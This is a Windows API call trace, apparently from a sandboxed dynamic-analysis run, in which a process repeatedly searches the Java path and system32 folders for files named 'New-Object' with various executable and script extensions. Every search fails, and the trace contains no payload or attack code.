	[0046.515] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dee0) returned 1
	[0046.515] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x184c18dab0, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x23
	[0046.515] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18def0) returned 1
	[0046.515] GetFileAttributesExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath" (normalized: "c:\\programdata\\oracle\\java\\javapath"), fInfoLevelId=0x0, lpFileInformation=0x184c18dfd0 | out: lpFileInformation=0x184c18dfd0*(dwFileAttributes=0x410, ftCreationTime.dwLowDateTime=0xe02be364, ftCreationTime.dwHighDateTime=0x1d31d80, ftLastAccessTime.dwLowDateTime=0xe02be364, ftLastAccessTime.dwHighDateTime=0x1d31d80, ftLastWriteTime.dwLowDateTime=0xe02be364, ftLastWriteTime.dwHighDateTime=0x1d31d80, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1
	[0046.515] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18deb0) returned 1
	[0046.515] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18df20) returned 1
	[0046.515] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x184c18da10, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x23
	[0046.515] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\New-Object.MSC", nBufferLength=0x105, lpBuffer=0x184c18d9b0, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath\\New-Object.MSC", lpFilePart=0x0) returned 0x32
	[0046.515] GetFullPathNameW (in: lpFileName="New-Object.MSC", nBufferLength=0x105, lpBuffer=0x184c18d9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Desktop\\New-Object.MSC", lpFilePart=0x0) returned 0x28
	[0046.515] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\New-Object.MSC", lpFindFileData=0x184c18dbc0 | out: lpFindFileData=0x184c18dbc0) returned 0xffffffffffffffff
	[0046.515] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18df40) returned 1
	[0046.515] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dee0) returned 1
	[0046.515] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x184c18dab0, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x23
	[0046.516] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18def0) returned 1
	[0046.516] GetFileAttributesExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath" (normalized: "c:\\programdata\\oracle\\java\\javapath"), fInfoLevelId=0x0, lpFileInformation=0x184c18dfd0 | out: lpFileInformation=0x184c18dfd0*(dwFileAttributes=0x410, ftCreationTime.dwLowDateTime=0xe02be364, ftCreationTime.dwHighDateTime=0x1d31d80, ftLastAccessTime.dwLowDateTime=0xe02be364, ftLastAccessTime.dwHighDateTime=0x1d31d80, ftLastWriteTime.dwLowDateTime=0xe02be364, ftLastWriteTime.dwHighDateTime=0x1d31d80, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1
	[0046.516] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18deb0) returned 1
	[0046.516] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18df20) returned 1
	[0046.516] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x184c18da10, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x23
	[0046.516] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\New-Object.CPL", nBufferLength=0x105, lpBuffer=0x184c18d9b0, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath\\New-Object.CPL", lpFilePart=0x0) returned 0x32
	[0046.516] GetFullPathNameW (in: lpFileName="New-Object.CPL", nBufferLength=0x105, lpBuffer=0x184c18d9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Desktop\\New-Object.CPL", lpFilePart=0x0) returned 0x28
	[0046.516] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\New-Object.CPL", lpFindFileData=0x184c18dbc0 | out: lpFindFileData=0x184c18dbc0) returned 0xffffffffffffffff
	[0046.516] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18df40) returned 1
	[0046.516] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dee0) returned 1
	[0046.516] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x184c18dab0, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x23
	[0046.516] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18def0) returned 1
	[0046.516] GetFileAttributesExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath" (normalized: "c:\\programdata\\oracle\\java\\javapath"), fInfoLevelId=0x0, lpFileInformation=0x184c18dfd0 | out: lpFileInformation=0x184c18dfd0*(dwFileAttributes=0x410, ftCreationTime.dwLowDateTime=0xe02be364, ftCreationTime.dwHighDateTime=0x1d31d80, ftLastAccessTime.dwLowDateTime=0xe02be364, ftLastAccessTime.dwHighDateTime=0x1d31d80, ftLastWriteTime.dwLowDateTime=0xe02be364, ftLastWriteTime.dwHighDateTime=0x1d31d80, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1
	[0046.516] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18deb0) returned 1
	[0046.517] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18df20) returned 1
	[0046.517] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x184c18da10, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x23
	[0046.517] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\New-Object", nBufferLength=0x105, lpBuffer=0x184c18d9b0, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath\\New-Object", lpFilePart=0x0) returned 0x2e
	[0046.517] GetFullPathNameW (in: lpFileName="New-Object", nBufferLength=0x105, lpBuffer=0x184c18d9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Desktop\\New-Object", lpFilePart=0x0) returned 0x24
	[0046.517] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\New-Object", lpFindFileData=0x184c18dbc0 | out: lpFindFileData=0x184c18dbc0) returned 0xffffffffffffffff
	[0046.517] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18df40) returned 1
	[0046.517] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dee0) returned 1
	[0046.517] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x184c18dab0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0046.517] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18def0) returned 1
	[0046.517] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x184c18dfd0 | out: lpFileInformation=0x184c18dfd0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xb7360118, ftLastAccessTime.dwHighDateTime=0x1d3a580, ftLastWriteTime.dwLowDateTime=0xb7360118, ftLastWriteTime.dwHighDateTime=0x1d3a580, nFileSizeHigh=0x0, nFileSizeLow=0x100000)) returned 1
	[0046.517] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18deb0) returned 1
	[0046.518] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18df20) returned 1
	[0046.518] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x184c18da10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0046.518] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\New-Object.ps1", nBufferLength=0x105, lpBuffer=0x184c18d9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\New-Object.ps1", lpFilePart=0x0) returned 0x22
	[0046.518] GetFullPathNameW (in: lpFileName="New-Object.ps1", nBufferLength=0x105, lpBuffer=0x184c18d9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Desktop\\New-Object.ps1", lpFilePart=0x0) returned 0x28
	[0046.518] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\New-Object.ps1", lpFindFileData=0x184c18dbc0 | out: lpFindFileData=0x184c18dbc0) returned 0xffffffffffffffff
	[0046.518] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18df40) returned 1
	[0046.518] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dee0) returned 1
	[0046.518] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x184c18dab0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0046.518] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18def0) returned 1
	[0046.518] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x184c18dfd0 | out: lpFileInformation=0x184c18dfd0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xb7360118, ftLastAccessTime.dwHighDateTime=0x1d3a580, ftLastWriteTime.dwLowDateTime=0xb7360118, ftLastWriteTime.dwHighDateTime=0x1d3a580, nFileSizeHigh=0x0, nFileSizeLow=0x100000)) returned 1
	[0046.518] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18deb0) returned 1
	[0046.518] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18df20) returned 1
	[0046.518] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x184c18da10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0046.518] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\New-Object.psm1", nBufferLength=0x105, lpBuffer=0x184c18d9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\New-Object.psm1", lpFilePart=0x0) returned 0x23
	[0046.518] GetFullPathNameW (in: lpFileName="New-Object.psm1", nBufferLength=0x105, lpBuffer=0x184c18d9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Desktop\\New-Object.psm1", lpFilePart=0x0) returned 0x29
	[0046.519] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\New-Object.psm1", lpFindFileData=0x184c18dbc0 | out: lpFindFileData=0x184c18dbc0) returned 0xffffffffffffffff
	[0046.519] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18df40) returned 1
	[0046.519] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dee0) returned 1
	[0046.519] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x184c18dab0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0046.519] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18def0) returned 1
	[0046.519] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x184c18dfd0 | out: lpFileInformation=0x184c18dfd0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xb7360118, ftLastAccessTime.dwHighDateTime=0x1d3a580, ftLastWriteTime.dwLowDateTime=0xb7360118, ftLastWriteTime.dwHighDateTime=0x1d3a580, nFileSizeHigh=0x0, nFileSizeLow=0x100000)) returned 1
	[0046.519] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18deb0) returned 1
	[0046.519] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18df20) returned 1
	[0046.519] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x184c18da10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0046.519] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\New-Object.psd1", nBufferLength=0x105, lpBuffer=0x184c18d9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\New-Object.psd1", lpFilePart=0x0) returned 0x23
	[0046.519] GetFullPathNameW (in: lpFileName="New-Object.psd1", nBufferLength=0x105, lpBuffer=0x184c18d9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Desktop\\New-Object.psd1", lpFilePart=0x0) returned 0x29
	[0046.519] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\New-Object.psd1", lpFindFileData=0x184c18dbc0 | out: lpFindFileData=0x184c18dbc0) returned 0xffffffffffffffff
	[0046.520] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18df40) returned 1
	[0046.520] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dee0) returned 1
	[0046.520] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x184c18dab0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0046.520] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18def0) returned 1
	[0046.520] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x184c18dfd0 | out: lpFileInformation=0x184c18dfd0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xb7360118, ftLastAccessTime.dwHighDateTime=0x1d3a580, ftLastWriteTime.dwLowDateTime=0xb7360118, ftLastWriteTime.dwHighDateTime=0x1d3a580, nFileSizeHigh=0x0, nFileSizeLow=0x100000)) returned 1
	[0046.520] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18deb0) returned 1
	[0046.520] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18df20) returned 1
	[0046.520] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x184c18da10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0046.520] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\New-Object.COM", nBufferLength=0x105, lpBuffer=0x184c18d9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\New-Object.COM", lpFilePart=0x0) returned 0x22
	[0046.520] GetFullPathNameW (in: lpFileName="New-Object.COM", nBufferLength=0x105, lpBuffer=0x184c18d9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Desktop\\New-Object.COM", lpFilePart=0x0) returned 0x28
	[0046.520] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\New-Object.COM", lpFindFileData=0x184c18dbc0 | out: lpFindFileData=0x184c18dbc0) returned 0xffffffffffffffff
	[0046.521] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18df40) returned 1
	[0046.521] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dee0) returned 1
	[0046.521] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x184c18dab0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0046.521] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18def0) returned 1
	[0046.521] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x184c18dfd0 | out: lpFileInformation=0x184c18dfd0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xb7360118, ftLastAccessTime.dwHighDateTime=0x1d3a580, ftLastWriteTime.dwLowDateTime=0xb7360118, ftLastWriteTime.dwHighDateTime=0x1d3a580, nFileSizeHigh=0x0, nFileSizeLow=0x100000)) returned 1
	[0046.521] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18deb0) returned 1
	[0046.521] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18df20) returned 1
	[0046.521] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x184c18da10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0046.521] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\New-Object.EXE", nBufferLength=0x105, lpBuffer=0x184c18d9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\New-Object.EXE", lpFilePart=0x0) returned 0x22
	[0046.521] GetFullPathNameW (in: lpFileName="New-Object.EXE", nBufferLength=0x105, lpBuffer=0x184c18d9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Desktop\\New-Object.EXE", lpFilePart=0x0) returned 0x28
	[0046.521] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\New-Object.EXE", lpFindFileData=0x184c18dbc0 | out: lpFindFileData=0x184c18dbc0) returned 0xffffffffffffffff
	[0046.521] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18df40) returned 1
	[0046.521] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dee0) returned 1
	[0046.521] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x184c18dab0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0046.521] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18def0) returned 1
	[0046.522] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x184c18dfd0 | out: lpFileInformation=0x184c18dfd0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xb7360118, ftLastAccessTime.dwHighDateTime=0x1d3a580, ftLastWriteTime.dwLowDateTime=0xb7360118, ftLastWriteTime.dwHighDateTime=0x1d3a580, nFileSizeHigh=0x0, nFileSizeLow=0x100000)) returned 1
	[0046.522] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18deb0) returned 1
	[0046.522] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18df20) returned 1
	[0046.522] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x184c18da10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0046.522] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\New-Object.BAT", nBufferLength=0x105, lpBuffer=0x184c18d9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\New-Object.BAT", lpFilePart=0x0) returned 0x22
	[0046.522] GetFullPathNameW (in: lpFileName="New-Object.BAT", nBufferLength=0x105, lpBuffer=0x184c18d9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Desktop\\New-Object.BAT", lpFilePart=0x0) returned 0x28
	[0046.522] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\New-Object.BAT", lpFindFileData=0x184c18dbc0 | out: lpFindFileData=0x184c18dbc0) returned 0xffffffffffffffff
	[0046.522] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18df40) returned 1
	[0046.522] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dee0) returned 1
	[0046.522] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x184c18dab0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0046.522] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18def0) returned 1
	[0046.522] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x184c18dfd0 | out: lpFileInformation=0x184c18dfd0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xb7360118, ftLastAccessTime.dwHighDateTime=0x1d3a580, ftLastWriteTime.dwLowDateTime=0xb7360118, ftLastWriteTime.dwHighDateTime=0x1d3a580, nFileSizeHigh=0x0, nFileSizeLow=0x100000)) returned 1
	[0046.522] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18deb0) returned 1
	[0046.522] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18df20) returned 1
	[0046.522] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x184c18da10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0046.522] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\New-Object.CMD", nBufferLength=0x105, lpBuffer=0x184c18d9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\New-Object.CMD", lpFilePart=0x0) returned 0x22
	[0046.522] GetFullPathNameW (in: lpFileName="New-Object.CMD", nBufferLength=0x105, lpBuffer=0x184c18d9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Desktop\\New-Object.CMD", lpFilePart=0x0) returned 0x28
	[0046.523] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\New-Object.CMD", lpFindFileData=0x184c18dbc0 | out: lpFindFileData=0x184c18dbc0) returned 0xffffffffffffffff
	[0046.523] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18df40) returned 1
	[0046.523] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dee0) returned 1
	[0046.523] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x184c18dab0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0046.523] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18def0) returned 1
	[0046.523] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x184c18dfd0 | out: lpFileInformation=0x184c18dfd0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xb7360118, ftLastAccessTime.dwHighDateTime=0x1d3a580, ftLastWriteTime.dwLowDateTime=0xb7360118, ftLastWriteTime.dwHighDateTime=0x1d3a580, nFileSizeHigh=0x0, nFileSizeLow=0x100000)) returned 1
	[0046.523] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18deb0) returned 1
	[0046.523] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18df20) returned 1
	[0046.523] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x184c18da10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0046.523] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\New-Object.VBS", nBufferLength=0x105, lpBuffer=0x184c18d9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\New-Object.VBS", lpFilePart=0x0) returned 0x22
	[0046.523] GetFullPathNameW (in: lpFileName="New-Object.VBS", nBufferLength=0x105, lpBuffer=0x184c18d9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Desktop\\New-Object.VBS", lpFilePart=0x0) returned 0x28
	[0046.523] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\New-Object.VBS", lpFindFileData=0x184c18dbc0 | out: lpFindFileData=0x184c18dbc0) returned 0xffffffffffffffff
	[0046.524] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18df40) returned 1
	[0046.524] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dee0) returned 1
	[0046.524] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x184c18dab0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0046.524] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18def0) returned 1
	[0046.524] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x184c18dfd0 | out: lpFileInformation=0x184c18dfd0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xb7360118, ftLastAccessTime.dwHighDateTime=0x1d3a580, ftLastWriteTime.dwLowDateTime=0xb7360118, ftLastWriteTime.dwHighDateTime=0x1d3a580, nFileSizeHigh=0x0, nFileSizeLow=0x100000)) returned 1
	[0046.524] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18deb0) returned 1
	[0046.524] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18df20) returned 1
	[0046.524] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x184c18da10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0046.524] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\New-Object.VBE", nBufferLength=0x105, lpBuffer=0x184c18d9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\New-Object.VBE", lpFilePart=0x0) returned 0x22
	[0046.524] GetFullPathNameW (in: lpFileName="New-Object.VBE", nBufferLength=0x105, lpBuffer=0x184c18d9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Desktop\\New-Object.VBE", lpFilePart=0x0) returned 0x28
	[0046.524] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\New-Object.VBE", lpFindFileData=0x184c18dbc0 | out: lpFindFileData=0x184c18dbc0) returned 0xffffffffffffffff
	[0046.524] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18df40) returned 1
	[0046.524] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dee0) returned 1
	[0046.524] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x184c18dab0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0046.525] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18def0) returned 1
	[0046.525] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x184c18dfd0 | out: lpFileInformation=0x184c18dfd0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xb7360118, ftLastAccessTime.dwHighDateTime=0x1d3a580, ftLastWriteTime.dwLowDateTime=0xb7360118, ftLastWriteTime.dwHighDateTime=0x1d3a580, nFileSizeHigh=0x0, nFileSizeLow=0x100000)) returned 1
	[0046.525] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18deb0) returned 1
	[0046.525] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18df20) returned 1
	[0046.525] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x184c18da10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
